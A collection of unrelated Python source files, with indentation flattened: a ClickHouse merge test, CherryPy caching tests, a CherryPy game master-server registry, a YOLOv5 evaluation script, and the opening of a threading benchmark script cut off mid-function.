node2.query('CREATE DATABASE test ENGINE=Ordinary')
yield cluster
finally:
cluster.shutdown()
def split_tsv(data):
return [x.split("\t") for x in data.splitlines()]
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_merge_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
db_name = "test"
table_name = "merge_simple"
name = db_name + "." + table_name
table_path = "data/" + db_name + "/" + table_name
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_merge_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY sleep(2)
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
node1.query("INSERT INTO {name} VALUES (3)".format(name=name))
parts = ["all_{}_{}_0".format(x, x) for x in range(starting_block, starting_block + 3)]
result_part = "all_{}_{}_1".format(starting_block, starting_block + 2)
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
wait = threading.Thread(target=time.sleep, args=(5,))
wait.start()
t = threading.Thread(target=optimize)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=table_name))) == [
[
db_name,
table_name,
"3",
"['{}','{}','{}']".format(*parts),
"['{clickhouse}/{table_path}/{}/','{clickhouse}/{table_path}/{}/','{clickhouse}/{table_path}/{}/']".format(
*parts, clickhouse=clickhouse_path, table_path=table_path),
result_part,
"{clickhouse}/{table_path}/{}/".format(result_part, clickhouse=clickhouse_path, table_path=table_path),
"all",
"0"
]
]
t.join()
wait.join()
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=table_name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_mutation_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
db_name = "test"
table_name = "mutation_simple"
name = db_name + "." + table_name
table_path = "data/" + db_name + "/" + table_name
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_mutation_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY tuple()
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
part = "all_{}_{}_0".format(starting_block, starting_block)
result_part = "all_{}_{}_0_{}".format(starting_block, starting_block, starting_block + 1)
def alter():
node1.query("ALTER TABLE {name} UPDATE a = 42 WHERE sleep(2) OR 1".format(name=name))
t = threading.Thread(target=alter)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=table_name))) == [
[
db_name,
table_name,
"1",
"['{}']".format(part),
"['{clickhouse}/{table_path}/{}/']".format(part, clickhouse=clickhouse_path, table_path=table_path),
result_part,
"{clickhouse}/{table_path}/{}/".format(result_part, clickhouse=clickhouse_path, table_path=table_path),
"all",
"1"
],
]
t.join()
time.sleep(1.5)
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=table_name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
|
test_caching.py
|
import datetime
import gzip
from itertools import count
import os
curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
import sys
import threading
import time
import urllib
import cherrypy
from cherrypy._cpcompat import next, ntob, quote, xrange
from cherrypy.lib import httputil
gif_bytes = ntob(
'GIF89a\x01\x00\x01\x00\x82\x00\x01\x99"\x1e\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x02\x03\x02\x08\t\x00;'
)
from cherrypy.test import helper
class CacheTest(helper.CPWebCase):
def setup_server():
class Root:
_cp_config = {'tools.caching.on': True}
def __init__(self):
self.counter = 0
self.control_counter = 0
self.longlock = threading.Lock()
def index(self):
self.counter += 1
msg = "visit #%s" % self.counter
return msg
index.exposed = True
def control(self):
self.control_counter += 1
return "visit #%s" % self.control_counter
control.exposed = True
def a_gif(self):
cherrypy.response.headers[
'Last-Modified'] = httputil.HTTPDate()
return gif_bytes
a_gif.exposed = True
def long_process(self, seconds='1'):
try:
self.longlock.acquire()
time.sleep(float(seconds))
finally:
self.longlock.release()
return 'success!'
long_process.exposed = True
def clear_cache(self, path):
cherrypy._cache.store[cherrypy.request.base + path].clear()
clear_cache.exposed = True
class VaryHeaderCachingServer(object):
_cp_config = {
'tools.caching.on': True,
'tools.response_headers.on': True,
'tools.response_headers.headers': [
('Vary', 'Our-Varying-Header')
],
}
def __init__(self):
self.counter = count(1)
def index(self):
return "visit #%s" % next(self.counter)
index.exposed = True
class UnCached(object):
_cp_config = {'tools.expires.on': True,
'tools.expires.secs': 60,
'tools.staticdir.on': True,
'tools.staticdir.dir': 'static',
'tools.staticdir.root': curdir,
}
def force(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
self._cp_config['tools.expires.force'] = True
self._cp_config['tools.expires.secs'] = 0
return "being forceful"
force.exposed = True
force._cp_config = {'tools.expires.secs': 0}
def dynamic(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
cherrypy.response.headers['Cache-Control'] = 'private'
return "D-d-d-dynamic!"
dynamic.exposed = True
def cacheable(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
return "Hi, I'm cacheable."
cacheable.exposed = True
def specific(self):
cherrypy.response.headers[
'Etag'] = 'need_this_to_make_me_cacheable'
return "I am being specific"
specific.exposed = True
specific._cp_config = {'tools.expires.secs': 86400}
class Foo(object):
pass
def wrongtype(self):
cherrypy.response.headers[
'Etag'] = 'need_this_to_make_me_cacheable'
return "Woops"
wrongtype.exposed = True
wrongtype._cp_config = {'tools.expires.secs': Foo()}
cherrypy.tree.mount(Root())
cherrypy.tree.mount(UnCached(), "/expires")
cherrypy.tree.mount(VaryHeaderCachingServer(), "/varying_headers")
cherrypy.config.update({'tools.gzip.on': True})
setup_server = staticmethod(setup_server)
def testCaching(self):
elapsed = 0.0
for trial in range(10):
self.getPage("/")
# The response should be the same every time,
# except for the Age response header.
self.assertBody('visit #1')
if trial != 0:
age = int(self.assertHeader("Age"))
self.assert_(age >= elapsed)
elapsed = age
# POST, PUT, DELETE should not be cached.
self.getPage("/", method="POST")
self.assertBody('visit #2')
# Because gzip is turned on, the Vary header should always Vary for
# content-encoding
self.assertHeader('Vary', 'Accept-Encoding')
# The previous request should have invalidated the cache,
# so this request will recalc the response.
self.getPage("/", method="GET")
self.assertBody('visit #3')
# ...but this request should get the cached copy.
self.getPage("/", method="GET")
self.assertBody('visit #3')
self.getPage("/", method="DELETE")
self.assertBody('visit #4')
# The previous request should have invalidated the cache,
# so this request will recalc the response.
self.getPage("/", method="GET", headers=[('Accept-Encoding', 'gzip')])
self.assertHeader('Content-Encoding', 'gzip')
self.assertHeader('Vary')
self.assertEqual(
cherrypy.lib.encoding.decompress(self.body), ntob("visit #5"))
# Now check that a second request gets the gzip header and gzipped body
# This also tests a bug in 3.0 to 3.0.2 whereby the cached, gzipped
# response body was being gzipped a second time.
self.getPage("/", method="GET", headers=[('Accept-Encoding', 'gzip')])
self.assertHeader('Content-Encoding', 'gzip')
self.assertEqual(
cherrypy.lib.encoding.decompress(self.body), ntob("visit #5"))
# Now check that a third request that doesn't accept gzip
# skips the cache (because the 'Vary' header denies it).
self.getPage("/", method="GET")
self.assertNoHeader('Content-Encoding')
self.assertBody('visit #6')
def testVaryHeader(self):
self.getPage("/varying_headers/")
self.assertStatus("200 OK")
self.assertHeaderItemValue('Vary', 'Our-Varying-Header')
self.assertBody('visit #1')
# Now check that different 'Vary'-fields don't evict each other.
# This test creates 2 requests with different 'Our-Varying-Header'
# and then tests if the first one still exists.
self.getPage("/varying_headers/",
headers=[('Our-Varying-Header', 'request 2')])
self.assertStatus("200 OK")
self.assertBody('visit #2')
self.getPage("/varying_headers/",
headers=[('Our-Varying-Header', 'request 2')])
self.assertStatus("200 OK")
self.assertBody('visit #2')
self.getPage("/varying_headers/")
self.assertStatus("200 OK")
self.assertBody('visit #1')
def testExpiresTool(self):
# test setting an expires header
self.getPage("/expires/specific")
self.assertStatus("200 OK")
self.assertHeader("Expires")
# test exceptions for bad time values
self.getPage("/expires/wrongtype")
self.assertStatus(500)
self.assertInBody("TypeError")
# static content should not have "cache prevention" headers
self.getPage("/expires/index.html")
self.assertStatus("200 OK")
self.assertNoHeader("Pragma")
self.assertNoHeader("Cache-Control")
self.assertHeader("Expires")
# dynamic content that sets indicators should not have
# "cache prevention" headers
self.getPage("/expires/cacheable")
self.assertStatus("200 OK")
self.assertNoHeader("Pragma")
self.assertNoHeader("Cache-Control")
self.assertHeader("Expires")
self.getPage('/expires/dynamic')
self.assertBody("D-d-d-dynamic!")
# the Cache-Control header should be untouched
self.assertHeader("Cache-Control", "private")
self.assertHeader("Expires")
# configure the tool to ignore indicators and replace existing headers
self.getPage("/expires/force")
self.assertStatus("200 OK")
# This also gives us a chance to test 0 expiry with no other headers
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
# static content should now have "cache prevention" headers
self.getPage("/expires/index.html")
self.assertStatus("200 OK")
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
# the cacheable handler should now have "cache prevention" headers
self.getPage("/expires/cacheable")
self.assertStatus("200 OK")
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
self.getPage('/expires/dynamic')
self.assertBody("D-d-d-dynamic!")
# dynamic sets Cache-Control to private but it should be
# overwritten here ...
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
def testLastModified(self):
self.getPage("/a.gif")
self.assertStatus(200)
self.assertBody(gif_bytes)
lm1 = self.assertHeader("Last-Modified")
# this request should get the cached copy.
self.getPage("/a.gif")
self.assertStatus(200)
self.assertBody(gif_bytes)
self.assertHeader("Age")
lm2 = self.assertHeader("Last-Modified")
self.assertEqual(lm1, lm2)
# this request should match the cached copy, but raise 304.
self.getPage("/a.gif", [('If-Modified-Since', lm1)])
self.assertStatus(304)
self.assertNoHeader("Last-Modified")
if not getattr(cherrypy.server, "using_apache", False):
self.assertHeader("Age")
def test_antistampede(self):
SECONDS = 4
# We MUST make an initial synchronous request in order to create the
# AntiStampedeCache object, and populate its selecting_headers,
# before the actual stampede.
self.getPage("/long_process?seconds=%d" % SECONDS)
self.assertBody('success!')
self.getPage("/clear_cache?path=" +
quote('/long_process?seconds=%d' % SECONDS, safe=''))
self.assertStatus(200)
start = datetime.datetime.now()
def run():
self.getPage("/long_process?seconds=%d" % SECONDS)
# The response should be the same every time
self.assertBody('success!')
ts = [threading.Thread(target=run) for i in xrange(100)]
for t in ts:
t.start()
for t in ts:
t.join()
self.assertEqualDates(start, datetime.datetime.now(),
# Allow a second (two, for slow hosts)
# for our thread/TCP overhead etc.
seconds=SECONDS + 2)
def test_cache_control(self):
self.getPage("/control")
self.assertBody('visit #1')
self.getPage("/control")
self.assertBody('visit #1')
self.getPage("/control", headers=[('Cache-Control', 'no-cache')])
self.assertBody('visit #2')
self.getPage("/control")
self.assertBody('visit #2')
self.getPage("/control", headers=[('Pragma', 'no-cache')])
self.assertBody('visit #3')
self.getPage("/control")
self.assertBody('visit #3')
time.sleep(1)
self.getPage("/control", headers=[('Cache-Control', 'max-age=0')])
self.assertBody('visit #4')
self.getPage("/control")
self.assertBody('visit #4')
|
OnlineSubsystemPythonServer.py
|
# Copyright (c) 2019 Ryan Post
# This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
import cherrypy
from cherrypy.lib import auth_digest
from cherrypy import response
import json
import jsonpickle
import time
from time import sleep
from threading import Thread
import requests
class Server(object):
def __init__(self):
self.registeredby = ''
self.name = ''
self.port = 0
self.map = ''
self.playercount = 0
self.maxplayers = 0
self.pwprotected = False
self.gamemode = ''
self.timeoflastheartbeat = 0
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.name== other.name and self.port == other.port
else:
return False
class MasterServer(object):
def __init__(self):
# Time between heartbeat in seconds, this is passed to the client and kept in sync.
self.time_between_heartbeats = 30
self.serverlist = []
thread = Thread(target = self.heartbeat)
thread.start()
def heartbeat(self):
while True:
for server in self.serverlist:
delta = int(time.time()) - server.timeoflastheartbeat
if (delta > self.time_between_heartbeats):
self.serverlist.remove(server)
sleep(1)
@cherrypy.expose
def register_server(self, name, port, map, maxplayers, pwprotected, gamemode):
if self.server_exists(cherrypy.request.remote.ip, port):
self.internal_update_server(cherrypy.request.remote.ip, port, name, map, 0, maxplayers, pwprotected, gamemode)
return json.dumps({'error' : False, 'message' : 'Sucessfully updated your server [%s %s:%s] on the server browser.' % (name, cherrypy.request.remote.ip, port)})
else:
server = Server()
server.ip = cherrypy.request.remote.ip
server.name = name
server.port = port
server.map = map
server.maxplayers = maxplayers
server.pwprotected = pwprotected
server.gamemode = gamemode
server.timeoflastheartbeat = int(time.time())
try:
r = requests.get('http://' + cherrypy.request.remote.ip + ':' + port, timeout=2)
except requests.exceptions.ConnectTimeout:
# ports are not forwarded...
if (cherrypy.request.remote.ip != "127.0.0.1"):
return json.dumps({'error' : True, 'message' : 'Unable to connect to server [%s %s:%s]. Please verify your ports are forwarded and your firewall is not blocking the game. Your server will not be visible in the Server Browser.' % (server.name, server.ip, server.port)})
except requests.exceptions.ConnectionError:
pass
self.serverlist.append(server)
return json.dumps({'error' : False, 'message' : 'Sucessfully added your server [%s %s:%s] to the server browser.' % (name, cherrypy.request.remote.ip, port), 'heartbeat' : self.time_between_heartbeats })
def internal_update_server(self, ip, port, name, map, playercount, maxplayers, pwprotected, gamemode):
for server in self.serverlist:
if server.ip == ip and server.port == port:
server.name = name
server.map = map
server.playercount = playercount
server.maxplayers = maxplayers
server.pwprotected = pwprotected
server.gamemode = gamemode
server.timeoflastheartbeat = int(time.time())
return True
return False
@cherrypy.expose
def update_server(self, port, name, map, playercount, maxplayers, pwprotected, gamemode):
if self.internal_update_server(cherrypy.request.remote.ip, port, name, map, playercount, maxplayers, pwprotected, gamemode):
return json.dumps({'error' : False, 'message' : 'Sucessfully updated your server [%s %s:%s] on the server browser.' % (name, cherrypy.request.remote.ip, port)})
return json.dumps({'error' : True, 'message' : 'Server not registered'})
def server_exists(self, ip, port):
for server in self.serverlist:
if server.ip == ip and server.port == port:
return True
return False
@cherrypy.expose
def unregister_server(self, port):
for server in self.serverlist:
if (server.registeredby == cherrypy.request.remote.ip and server.port == port):
self.serverlist.remove(server)
@cherrypy.expose
def get_serverlist(self):
self.returnlist = []
for server in self.serverlist:
jsonstring = {'name' : server.name, 'port' : server.port, 'map' : server.map, 'playercount' : server.playercount, 'maxplayers' : server.maxplayers, 'pwprotected' : server.pwprotected, 'gamemode' : server.gamemode, 'ip' : server.ip }
self.returnlist.append(jsonstring)
return json.dumps({'error' : False, 'message' : '', 'servers' : self.returnlist})
@cherrypy.expose
def perform_heartbeat(self, port):
for server in self.serverlist:
if (server.ip == cherrypy.request.remote.ip and server.port == port):
server.timeoflastheartbeat = int(time.time())
cherrypy.config.update({ 'server.socket_port': 8081,
'server.socket_host': '0.0.0.0',
"server.ssl_module": "pyopenssl",
'server.thread_pool' : 100
})
masterserver = MasterServer()
cherrypy.quickstart(masterserver)
|
test.py
|
# neuralmagic: no copyright
# flake8: noqa
# fmt: off
# isort: skip_file
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None,
half_precision=True):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
crowded_calculate.py
|
import requests
import time
from threading import Thread
from multiprocessing import Process
import os,sys
_head = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'
}
url = "http://www.tieba.com"
def count(x, y):
# 使程序完成150万计算
c = 0
while c < 500000:
c += 1
x += 1
y += 1
def write():
dir = os.path.dirname(os.path.realpath(__file__))
filepath = os.path.join(dir,'test.txt')
with open(filepath, 'w') as f:
for x in range(5000000):
f.write("testwrite\n")
def read():
dir = os.path.dirname(os.path.realpath(__file__))
filepath = os.path.join(dir, 'test.txt')
